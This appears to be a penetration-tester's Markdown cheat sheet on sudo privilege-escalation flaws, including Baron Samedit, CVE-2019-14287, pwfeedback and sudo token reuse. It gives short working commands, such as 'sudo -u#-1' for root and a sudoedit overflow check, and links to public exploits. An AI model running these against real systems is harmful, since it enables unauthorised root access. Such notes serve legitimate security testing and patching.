59 lines
1.7 KiB
Markdown
59 lines
1.7 KiB
Markdown
# CVE-2021-3156 Baron Samedit
|
|
|
|
* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
|
|
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
|
|
* Heap based overflow
|
|
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
|
|
* Check vulnerability via
|
|
```sh
|
|
sudoedit -s '\' $(python -c "print('\x41' * 10000)")
|
|
```
|
|
* Defaults to try
|
|
```sh
|
|
./brute.sh 90 120 50 70 150 300
|
|
```
|
|
|
|
## CVE-2019-14287
|
|
|
|
* Versions < 1.8.28
|
|
|
|
### Usage
|
|
|
|
* Integer overflow with resulting root status.
|
|
```sh
|
|
sudo -u#-1 <app>
|
|
```
|
|
## CVE-18634
|
|
|
|
* Sudo pwnge with pwfeedback()
|
|
* Sudo version 1.7.1 to 1.8.30
|
|
* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634)
|
|
|
|
|
|
## Reusing Sudo Token
|
|
|
|
* Reuse sudo token of currently logged in user
|
|
* [Hacktricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
|
|
|
|
* `ptrace` has to be fully enabled
|
|
```sh
|
|
cat /proc/sys/kernel/yama/ptrace_scope
|
|
0
|
|
```
|
|
* sudo has to be triggered the last 15 minutes, check `ps wuax`
|
|
* `gdb` has to be installed
|
|
* One must be logged in as the same user which should be owned
|
|
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)
|
|
|
|
## Heap Based Overflow
|
|
|
|
* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)
|
|
|
|
Marco Benatto:
|
|
> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains
|
|
a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result
|
|
in a heap-based buffer over-read. This can be triggered by arbitrary local
|
|
users with access to Sudo by entering a password of seven characters or
|
|
fewer. The impact could vary depending on the compiler and processor architecture.
|
|
|